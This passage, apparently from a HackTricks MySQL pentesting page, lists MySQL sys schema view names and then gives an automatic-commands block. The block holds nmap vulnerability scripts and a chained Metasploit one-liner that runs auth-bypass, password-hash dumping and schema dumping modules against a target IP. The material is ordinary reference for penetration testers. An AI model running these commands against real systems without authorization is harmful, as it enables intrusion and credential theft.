statement_analysis\
statements_with_errors_or_warnings\
statements_with_full_table_scans\
statements_with_runtimes_in_95th_percentile\
statements_with_sorting\
statements_with_temp_tables\
sys_config\
user_summary\
user_summary_by_file_io\
user_summary_by_file_io_type\
user_summary_by_stages\
user_summary_by_statement_latency\
user_summary_by_statement_type\
version\
wait_classes_global_by_avg_latency\
wait_classes_global_by_latency\
waits_by_host_by_latency\
waits_by_user_by_latency\
waits_global_by_latency\
x$host_summary\
x$host_summary_by_file_io\
x$host_summary_by_file_io_type\
x$host_summary_by_stages\
x$host_summary_by_statement_latency\
x$host_summary_by_statement_type\
x$innodb_buffer_stats_by_schema\
x$innodb_buffer_stats_by_table\
x$innodb_lock_waits\
x$io_by_thread_by_latency\
x$io_global_by_file_by_bytes\
x$io_global_by_file_by_latency\
x$io_global_by_wait_by_bytes\
x$io_global_by_wait_by_latency\
x$latest_file_io\
x$memory_by_host_by_current_bytes\
x$memory_by_thread_by_current_bytes\
x$memory_by_user_by_current_bytes\
x$memory_global_by_current_bytes\
x$memory_global_total\
x$processlist\
x$ps_digest_95th_percentile_by_avg_us\
x$ps_digest_avg_latency_distribution\
x$ps_schema_table_statistics_io\
x$schema_flattened_keys\
x$schema_index_statistics\
x$schema_table_lock_waits\
x$schema_table_statistics\
x$schema_table_statistics_with_buffer\
x$schema_tables_with_full_table_scans\
x$session\
x$statement_analysis\
x$statements_with_errors_or_warnings\
x$statements_with_full_table_scans\
x$statements_with_runtimes_in_95th_percentile\
x$statements_with_sorting\
x$statements_with_temp_tables\
x$user_summary\
x$user_summary_by_file_io\
x$user_summary_by_file_io_type\
x$user_summary_by_stages\
x$user_summary_by_statement_latency\
x$user_summary_by_statement_type\
x$wait_classes_global_by_avg_latency\
x$wait_classes_global_by_latency\
x$waits_by_host_by_latency\
x$waits_by_user_by_latency\
x$waits_global_by_latency
## HackTricks Automatic Commands
```
Protocol_Name: MySql #Protocol Abbreviation if there is one.
Port_Number: 3306 #Comma separated if there is more than one.
Protocol_Description: MySql #Protocol Abbreviation Spelled out
Entry_1:
  Name: Notes
  Description: Notes for MySql
  Note: |
    MySQL is a freely available open source Relational Database Management System (RDBMS) that uses Structured Query Language (SQL).
    https://book.hacktricks.xyz/pentesting/pentesting-mysql
Entry_2:
  Name: Nmap
  Description: Nmap with MySql Scripts
  Command: nmap --script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse {IP} -p 3306
Entry_3:
  Name: MySql
  Description: Attempt to connect to mysql server
  Command: mysql -h {IP} -u {Username}@localhost
Entry_4:
  Name: MySql consolesless mfs enumeration
  Description: MySql enumeration without the need to run msfconsole
  Note: sourced from https://github.com/carlospolop/legion
  Command: msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_version; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_authbypass_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/admin/mysql/mysql_enum; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_hashdump; set RHOSTS {IP}; set RPORT 3306; run; exit' && msfconsole -q -x 'use auxiliary/scanner/mysql/mysql_schemadump; set RHOSTS {IP}; set RPORT 3306; run; exit'
```